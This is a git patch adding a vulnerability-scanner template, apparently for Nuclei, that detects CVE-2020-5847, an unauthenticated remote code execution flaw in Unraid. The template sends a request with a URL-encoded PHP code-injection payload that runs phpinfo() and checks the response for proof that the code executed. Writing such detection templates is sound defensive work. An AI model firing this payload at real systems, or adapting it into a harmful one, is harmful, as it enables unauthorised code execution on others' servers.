From 70c955c2c0e6c199816df85b17f3d9ec9c2b4f65 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Mon, 15 Feb 2021 02:22:26 +0530 Subject: [PATCH] Create CVE-2020-5847.yaml --- cves/2020/CVE-2020-5847.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cves/2020/CVE-2020-5847.yaml diff --git a/cves/2020/CVE-2020-5847.yaml b/cves/2020/CVE-2020-5847.yaml new file mode 100644 index 0000000000..fb1a3eceb8 --- /dev/null +++ b/cves/2020/CVE-2020-5847.yaml @@ -0,0 +1,21 @@ +id: CVE-2020-5847 +info: + name: UnRaid Remote Code Execution + author: madrobot + severity: high + reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ + tags: Directory Traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "http://www.php.net/" + part: body